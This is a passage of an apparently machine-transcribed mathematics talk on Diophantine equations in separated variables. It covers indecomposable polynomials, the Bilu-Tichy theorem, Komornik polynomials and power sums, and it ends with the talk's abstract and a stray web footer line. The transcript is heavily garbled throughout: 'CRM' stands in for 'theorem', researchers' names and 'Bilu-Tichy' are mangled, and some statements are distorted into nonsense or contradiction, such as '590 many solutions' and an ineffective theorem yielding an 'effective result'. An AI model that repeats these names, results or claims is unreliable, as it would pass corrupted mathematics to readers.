where g1 and g2 are both polynomials over the same field. And we say that such a decomposition is non-trivial if the degree of both these polynomial g1 and g2 is larger than 1. So if none of the polynomials g1 and g2 is linear. If we have two decompositions we say that these decompositions are equivalent. If there exists a linear polynomial with coefficients in the field k such that g1 can be expressed by h1 in the variable Lx and h2 of x is L of g2 of x. We will say that the polynomial f of x is decomposable over k if it has at least one non-trivial decomposition otherwise it is called indecomposable. And what we proved together with Vashu, Haidler and Luka was that the polynomial fk of x is indecomposable over the complex field for any k larger or equal to zero. To prove this we had two very nice tools, two lemmas of the yellow line usage. They proved that if fx is a polynomial with integer coefficients which is monic and it is decomposable over the complex field then there exists also decomposition over z. Further they also proved that if we have a polynomial f of x which is monic and has integer coefficients then in the case of any decomposition f of x equals gh of x the outer polynomial the degree of the outer polynomial is such that its degree is smaller or equal to the gcd of the second coefficient and the degree of the polynomial. So whenever we have a decomposition the outer polynomial is of degree less than the gcd of this coefficient and n the degree of the polynomial. This means that the gcd of a and n if this is co-prime then m is smaller or equal to one that means that if a and n are co-prime then any decomposition is with degree of g equals one which means that f is in decomposable so any decomposition would be a trivial decomposition. So let us see how can we use this for proving that fk of x is in decomposable. First of all let us see how fk of x looks like. We know that fk of x has degree k plus one it is monic so we just denote its coefficient by one ck minus one and so on c1 and we know that zero is a root of fk of x so c0 must be zero. It is not very hard I would say it is very easy to compute ck which is one plus k times k plus one over two. Now if you take a look at it this when k is even then this is k plus one times an integer if I add one that is co-prime to k plus one so in this case by the CRM of Duiola and Goussic fk of x is in decomposable this is the easy case when k is odd then we have to do a little bit more computations in this case we see that k plus one and ck has a gcd which is at most two. Well of course in the case when the degree of the outer polynomial if fk of x equals h of g of x if the degree of the outer polynomial is one that's a trivial decomposition so it doesn't count so the only way we may have a non-trivial decomposition is the degree of h is two because the degree of the outer polynomial the external polynomial must be smaller or equal to two. So assume that we have a quadratic polynomial h equals ax square plus bx plus c. Now then h of g of x looks like this and clearly now this is the decomposition of the polynomial fk of x but by the CRM of Duiola and Goussic we know that if it has a decomposition over the complex numbers it has a decomposition over the integers so we may assume without loss of generality that abc are integers and g is a polynomial with integer coefficients. From this it is easy to see that a must be equal to one because f has leading coefficient one so this means that a times the square of the leading coefficient of g must be one. All are integers so a must be one. This means that if you and we are the polynomial are the roots of the polynomial h the quadratic polynomial ax square or now x square plus bx plus c then fk of x can be written like g of x minus u times g of x minus v but we know that fk of zero is zero so either one or the other factor must be zero so we get g zero equals u or g zero equals v which now shows that either u or v is integer but now we have a quadratic equation if one of the roots is integer then the other one must be integers so both you and we are integers. So we may just denote gx minus u by h and then we know that gx minus v will be h of x plus d where d is u minus v but what is important then this d is an integer. So now we have fk of x equals h times h plus d and let us use the property of fk of x that fk of minus one is minus one that means that h minus one times h of minus one plus d they give minus one so since h of x and h of x plus d are integers then h of minus one equals plus or minus one and h of minus one plus d equals plus or minus one consequently we obtain d equals zero or d equals plus or minus two but d equals zero would mean that fk of x is h of x to d square but this contradicts that all the roots of f of x fk of x are simple roots and when we have d equals plus or minus two then we get that fk of x plus one will be a square but again we have proved that fk of x plus one has only simple roots which gives again a contradiction so all together fk of x is incomposable. This CRM was used to prove the second part of the following more general result let g of x be a polynomial with rational coefficients and consider the the of anti-inequation fk of x equals g of y so now the right hand side is an arbitrary polynomial and on the left hand side we do have this polynomial which is the sum of products of consecutive integers. Assume that k is larger or equal to three then in the case when the degree of the polynomial g is zero or two then there exists an effectively computable constant depending only on this index k and the polynomial g such that the maximum absolute value of the integer solutions of equation four is bounded by this constant so we can prove an effective finiteness CRM in this case whenever the degree of g is larger or equal to three then we can prove that equation four has only finitely many integer solution unless we have g of x equals fk h of x clearly in this case there will be infinitely many solutions so in the case of g equals zero or two we have effective finiteness and in the case of g larger or equal to three we do have ineffective finiteness here in the second point the finiteness is ineffective because we are using the bilou tihi criterion the bilou tihi CRM and since the bilou tihi CRM is ineffective the results proved by it will also be effective result this means that there are no bounds on the size of the solutions it proves a finiteness where there is no guaranteed that there is a bound we cannot just produce an effective upper bound well what about the cases which are excluded first of all whenever g of x equals fk of h of x then clearly we may have infinitely many solutions also when the degree of g equals one we may have infinitely many solutions well it is clear whenever g is linear then this might have infinitely many solutions let's say if g of y equals y then we just have fk of x equals an integer and if y is that integer that's a solution so for every x we get a solution y again when g of x is fk of h of x the same situation holds whenever h of x assumes a value then we can take for let's say for y or for the other unknown this value and we get a solution so in this case is we always have infinitely many solutions and it may happen also for k smaller or equal to two at the beginning of the CRM we assume k is larger or equal to three well when k is smaller or equal to two it may happen that there are infinitely many solutions these conditions are necessary now in case of our CRM now a few words about the proof of statement two I will not tell anything about the proof of the first statement but about the second statement where we use the ability CRM I would like to sketch the main ideas of the proof so it is this part of the CRM so as in the CRM we assume that k is larger or equal to three and the g is a polynomial with rational coefficients of degree at least three and we assume that this equation has infinitely many solutions now let us see what can be inferred from that the ability CRM describes very explicitly what situation this can happen fk of x must be phi of f of lambda of x and g must be phi of g of k of x the phi here is the same polynomial lambda and kappa they are linear polynomials and f and g are coming from a standard pair over q now we know we have proved a few slides before that fk of x is indecomposable so that means that the degree of this phi is either one or it is k plus one if it's one then of course f must be of degree k plus one otherwise f will be linear so let us see the two cases we will address first the case when degree of phi of x equals k plus one we just recall that this is how fk and g of x are composed now from this composition we see that the degree of f must be one because this is of degree k plus one phi is of degree k plus one so f must be linear but then clearly we have fk of x equals phi t of x where t of x is f lambda of x it's linear now we can take the inverse function of the polynomial function t of x so that t of t minus one gives the identity function so this means that fk of t minus x is just phi of x so we can express phi of x in the form fk of something which is linear now if we go to the other part of the or other polynomial g of x g of x is composed like phi of g of tappa of x but phi can be written like fk of t minus one and now you see that this is fk of something and in principle we don't care what is here inside the only important feature is that it is a polynomial with rational coefficients and of degree at least one so this means that we can prove that g of x equals fk of h of x this is the exceptional case when we may have infinitely many solutions and we will see that there are no other possibilities for infinitely many solutions since the other possibility is when the degree of phi of x equals one whenever the degree of phi of x equals one we can write phi of x like this and in this case we have to study all the possible standard pairs now we have five kinds of standard pairs in the case of standard pairs of type two this can be excluded because there we have a polynomial of degree two but f of x and g of x cannot be of degree two in this case because f of x must be of degree k plus one if i go back here now phi is linear lambda is linear so in order to get the polynomial of degree k plus one f must be of degree k plus one it cannot be quadratic polynomial so on the other hand the other polynomial let me just come back for a second here to the second type standard pairs so one of them must be x square and the other one must be of this shape but here it's clear that this polynomial has multiple roots whenever the degree is larger than two or larger than larger equal to four sorry so in that case again we see that it has multiple roots but f k of x cannot have multiple roots so this way we can exclude polynomials of pairs of polynomials of type two standard pairs of type two standard pairs of certain force kind they are the polynomials which are defined using with some polynomials we can exclude them by comparing coefficients in this equation in the case of standard pairs of type five in principle we have two cases f k of x must be either of this shape which contradicts with the in the composibility of f if we look at this then this shows that there is a polynomial eight times lambda x square minus one to the cube but this means that this polynomial is composed to phi x cube plus phi one x cube plus phi zero so this is a non-trivial composition of polynomials f k cannot be of this shape on the other hand we may have f k of x equals this shape and in this case we just compare again coefficients and after comparing three four coefficients we get a contradiction in the case of the first type again the root structure of f k of x and the derivative of f k of x prove that such standard pairs are impossible well of course here we have some lengthier computation which I have no time to to show for these situations but this is the flavor of the of the proof we also proved an effective result in the case of the equation f k of x equals a y to the n plus b we could prove that the solutions are bounded by an effectively computable constant and well this is a generalization of the result of Hoidl-Lichram and Tange who considered the case a equals one and b equals zero now we will switch our attention to a different topic. Comornic polynomials are polynomials introduced by Riemann-Kommornig for some results concerning digital expansions and if we define a sub n of x equals x to the power two times three to the power n minus x to the power three to the n minus one and we multiply such polynomials from k equals zero to n then we get the n's Komornig polynomial. Komornig polynomials the first few of them look like this the first one is easy to see but the second one and the third one are these polynomials so we can see that these are polynomials with coefficients plus or minus one and there are the degree of this of such polynomials is always c to the power n plus one minus one. All coefficients are plus or minus one below the highest degree term below the main term there are no other coefficients than plus or minus one including zero there is no zero coefficient so all the terms are present it consists of c to the power n plus one monomials and all these monomials have coefficients either plus one or minus one. It is also proved that all the complex roots of such polynomials are simple. The first important result concerning Komornig polynomials is that Komornig polynomials are incomposable over c and this helps us to use this for to apply the B-Lutih C-R-M later but for the moment let us see a few more properties of a k of x. In principle there is a polynomial identity a l plus k of x equals a of a sub l of x to the power three to the power k and if we denote the Fibonacci numbers but by phi zero, pi one and so on and we define f sub k to be phi of three to the power k plus one plus phi of three to the k minus one minus one then these are clearly integer numbers these integer numbers will play an important role in the GCD of two values of this polynomial a k of x. So if we take the polynomial a k of x in any integer space and we compute it for the index l and for the index l plus k then the GCD of these two integers will divide the integer a sub k defined just here using the Fibonacci numbers. So this way for polynomials with index close to each other we can compute the GCD or we can prove how much is the GCD if they are consecutive in this is k and k plus one then the GCD will always be one and if between the indexes between the indices the difference is two then the GCD is either one or five. So after these auxiliary properties let us show about show the results concerning the of anti-equations containing Pomornik polynomials the problem originates from Atilla Petu who asked in a conference about the finiteness of number of solutions of e sub n of x equals e sub n of y. With Kolushpink and Schustek we did prove that the equation p sub n of x equals p sub m of y has always finitely many integer solutions and even more general we consider the equation with arbitrary right hand side and we did prove that if g of x is not of the form p sub n of h of x or g of x is not of the form gamma of delta x to the l where gamma and delta are linear polynomials directional coefficients and l is just the degree of this polynomial g then we have only finitely many solutions. However I have to mention that the first exception that's necessary the second exception we couldn't prove that in this case there are infinitely many solutions so it may it probably may be excluded but we were just unable to prove that. Well that was what it was written here and of course since we use BDT-CRM the result is ineffective. We also did prove some results concerning this polynomial which are effective in the case of the equation p of n of x equals y to the m. We did get effective solutions both in the case m equals to or m larger would be equal to 3 and we even could prove an effective result but for the exponent m from here whenever y is different of plus or minus one and for the concrete cases of y square in the right hand side we did solve completely this equation there are some trivial solutions and except of the trivial solutions it exists only one non-trivial solution in the case when n equals 2 and we did solve the equation also for n equals 1, 2, 3, 4 and 5. Further we did prove we did solve completely the equation p of n of x equals y cube for n equals 0, 1, 2 and 3. As my time is going I will not tell about these results in details however I will switch to my third topic power values of power sums. Well if you take s k of x 1 to the k plus 2 to the k plus x to the k this is s k of x and the problem s k of x equals y to the n this is a well-known and much-investigated classical problem it goes back to Luca Watson and the first international known base through was you to check for could prove that if k and n is not one of these pairs then this equation 16 has only 590 many solutions. He also conjectured that if k and n are not k and is not of this pair not not one of these pairs then the only non-trivial solution is given by 2, 2, 24 and 70. Many results concerning this equation have been established during the last few decades. Yuri Tiedemann and Forkhoof proved an effective version of Schaeffer and they have another extra feature that also n was an unknown so in this equation also the exponent was an unknown for them and the effective finiteness was working also in this more general case. Then Pinter proved that for non-trivial solutions we have this bound and the conjecture was verified by Jacobson Pinter and Walsh for some bounded values of k and n equals 2. Benadio and Pinter extended the result to one smaller or equal to k smaller or equal to 11 and arbitrary and larger or equal to 2. This was again an important breakthrough and Pinter verified the conjecture for and larger than 4 and one smaller or equal to k smaller than 107. This is of course not a complete list of results. However, how do we initiate the investigation of this equation for fixed values of x? For values of x which are smaller than 25 and are congruent of 0 and 3 mod 4, he computed all the solutions and together with Koidu Mierzak and Inc. we extended this result for the cases when k is congruent to one or two mod 4. In principle this shows that we proved the Schaeffer conjecture for x smaller than 25 and larger or equal to 3. Now finally I would like to mention few other kinds of equations where S k of x is included and the Bielow-Tihe CRM is used, but these results are not mine. I couldn't contribute to this topic. Bielow-Grinsow-Kinscher Hofer-Pieter and Tihe consider the equation S k of x equals SM of y and for the case when Geofi is the product of consecutive integers Bielow-Binser Hofer-Pieter and Tihe proved again, then Jürj Kovac, Peter and Inter for binomial coefficients and for this kind of sums Jürj Kovac, Peter and Inter. So also for such kind of separable equations Bielow-Tihe CRM was used and it was a powerful tool. Thank you very much for your attention. This was what I wanted to tell. Yeah so thank you very much Attila for your very nice and rich talk. So it's open for discussion and I already can see a very precise question by Gary Walsh who is our next speaker. So the question you can read here is it possible to read it? Just a second I'm trying to find out. So he is asking where do the upper pounds come on page 28? On page 28. Very precise question. Page 28 just let me find oh no I'm sorry no no it's 20 oh yeah 28. I see well these are coming from super and hyper elliptic equations from Baker's theory from a result of Jahn de Kewer, Czekalman, Jürj and myself. We have a an explicit a completely explicit result for this case and we use that CRM for this.
|
A Diophantine equation has separated variables if it is of the form f(x)=g(y) for polynomials f, g. In a more general sense the degree of f and g may also be a variable.In the present talk various results for special types of the polynomials f and g will be presented. The types of the considered polynomials contain power sums, sums of products of consecutive integers, Komornik polynomials, perfect powers. Results on F-Diophantine sets, which are proved using results on Diophantine equations in separated variables will also be considered. The main tool for the proof of the presented general qualitative results is the famous Bilu-Tichy Theorem. Further, effective results (which depend on Baker’s method) and results containing the complete solutions to special cases of these equations will also be included.
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.